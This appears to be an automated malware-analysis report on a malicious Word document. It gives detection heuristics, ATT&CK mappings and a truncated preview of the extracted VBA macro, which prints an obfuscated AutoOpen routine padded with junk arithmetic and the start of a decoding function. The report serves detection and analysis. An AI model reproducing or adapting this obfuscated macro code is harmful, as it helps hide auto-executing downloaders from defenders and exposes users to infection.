MALICIOUS
242
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1203 Exploitation for Client Execution
The sample is a malicious Office document containing a VBA macro. The macro is triggered by the AutoOpen function and uses a Shell() call, indicating an attempt to execute arbitrary commands. This is strongly suggestive of a downloader or dropper functionality, where the macro is used to fetch and execute a secondary payload. The ClamAV detection name 'Doc.Macro.Valyria-6327969-0' further supports its malicious nature.
Heuristics 7
-
ClamAV: Doc.Macro.Valyria-6327969-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Macro.Valyria-6327969-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://ns.adobe.com/xap/1.0/ In document text (OLE body)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
- http://purl.org/dc/elements/1.1/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
- http://ns.adobe.com/tiff/1.0/In document text (OLE body)
- http://ns.adobe.com/exif/1.0/In document text (OLE body)
- http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
- http://www.iec.chIn document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 23796 bytes |
SHA-256: a7a2a436ff4ddedafc7649fc1c297b9a7c84b92e946217c960465665b61a636f |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "bdIFv" Sub AutoOpen() Dim tVMuS As Integer tVMuS = 335 - 169 If tVMuS <> 39281 Then ct6CvrLM = -11527 Else upfdqHX = 22409.432849937 End If Dim v6fJBw As Integer v6fJBw = 335 - 169 If v6fJBw > 39281 Then PF132 = False Else dxyIbmnV = 2969.1845256388 End If Dim myjwYl3RW As Integer myjwYl3RW = 335 - 169 If myjwYl3RW = 39281 Then idqb1g = 216 Else RbVnW7 = 0 End If RkCUaI Dim jDNvz0Z As Integer jDNvz0Z = 418 - 368 If jDNvz0Z <> 41244 Then DxEui = AYIc6ng Else IV29b = AYIc6ng End If Dim ioAtJbH As Integer ioAtJbH = 418 - 368 If ioAtJbH <> 41244 Then NhOvVmcLa = 180 Else ZP9iS = 46969.270308115 End If Dim F5iHv As Integer F5iHv = 418 - 368 If F5iHv < 41244 Then tCFHYkStW = True Else g4XDA = -1581222382 End If Dim BZFKO6uG As Integer BZFKO6uG = 6812 / 524 If BZFKO6uG > 62619 Then Z251hb6B = HkguNU Else ALVtI2i8 = False End If Dim fCBeM97 As Integer fCBeM97 = 6812 / 524 If fCBeM97 <> 62619 Then vlKjNWsZV = 67 Else P3J9vUdh = 24033 End If End Sub Attribute VB_Name = "nPI8yK" Private Const qdvLKk = 16711680 Private Const l3oul4B = 65280 Private Const CEAjCc = 255 Private Const ndyoCX = 262144 Private Const FGEdzILX = 4096 Private Const S5hFk = 64 Private Const F7Utn = 256 Private Const BHG8NrlTM = 65536 Public Function Sn8vfim(gh4RuE7Gk As String) As String Dim UaWXj() As Byte, bIn() As Byte, bTrans(255) As Byte, lPowers6(63) As Long, lPowers12(63) As Long Dim lPowers18(63) As Long, lQuad As Long, iPad As Integer, lChar As Long, lPos As Long, sOut As String Dim lTemp As Long Dim EHz2XJ As Integer EHz2XJ = 277 - 206 If EHz2XJ = 44007 Then tfRyu4dHn = 45156.819918107 Else FCtnE = 20544 End If Dim IGELjYDvs As Integer IGELjYDvs = 277 - 206 If IGELjYDvs < 44007 Then BBk6Z0F = 29407 Else EfVUsB = 42522.117922804 End If Dim MUaWF As Integer MUaWF = 277 - 206 If MUaWF > 44007 Then fFCys = 32283.228682626 Else GwnEWz = 92 End If gh4RuE7Gk = Replace(gh4RuE7Gk, vbCr, vbNullString) Dim NwRTcJ8j As Integer NwRTcJ8j = 90 + 88 If NwRTcJ8j > 35021 Then ASJGxB = 9481.8215327367 Else QzWlB = 4475 End If Dim Iim9h8GN As Integer Iim9h8GN = 90 + 88 If Iim9h8GN <> 35021 Then EiVPHfsd = BPFIkCS3L Else VUWp5gh = 13062 End If Dim zLIKGS90 As Integer zLIKGS90 = 90 + 88 If zLIKGS90 < 35021 Then rjUNO = 39176.998861444 Else THhN3kL = -26841 End If Dim DOLWZ As Integer DOLWZ = -1 + 130 If DOLWZ > 45368 Then GvoS6cpKm = 30 Else XeBIjK0 = 3342.1421932239 End If Dim eC1gyln As Integer eC1gyln = -1 + 130 If eC1gyln < 45368 Then AtaMZ6P = 560.51457941202 Else s0xn23PA = -16715 End If Dim PMZFY8Qwp As Integer PMZFY8Qwp = -1 + 130 If PMZFY8Qwp > 45368 Then huxK0X = False Else u9xPmiy = False End If gh4RuE7Gk = Replace(gh4RuE7Gk, vbLf, vbNullString) Dim zqY6m As Integer zqY6m = 4896 / 32 If zqY6m <> 40267 Then Kwq9bQs1r = 18168.426158892 Else sc9RA2 = 120 End If Dim KNkDm As Integer KNkDm = 4896 / 32 If KNkDm <> 40267 Then ZYqK21mx = True Else W1j42TWf7 = 43555.157577191 End If Dim puaGbdhM As Integer puaGbdhM = 306 - 179 If puaGbdhM > 47453 Then MvfHp = 0 Else ho6zpXs1E = 0 End If Dim P7J4yS As Integer P7J4yS = 306 - 179 If P7J4yS <> 47453 Then uDTjtx = 26706.771965411 Else Nuwif = False End If lTemp = Len(gh4RuE7Gk) Mod 4 Dim B4glsh As Integer B4glsh = 154 + 8 If B4glsh > 58054 Then IYMCl4 = 50818.27949097 Else Gh3gZGzM = 11957 End If Dim vi43L0e2 As Integer vi43L0e2 = 154 + 8 If vi43L0e2 < 58054 Then IHMu7 = 62083.387963299 Else ddmxc = 0 End If Dim osdWV0a As Integer osdWV0a = 14740 / 110 If osdWV0a <> 39059 Then QBcZ0 = 0 Else VxPTVOM = 39114.756126649 End If Dim bChSr As Integer bChSr = 14740 / 110 If bChSr > 39059 Then mEvl3asw = 4827.6607343674 Else dafPg = -1903 ... (truncated) |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.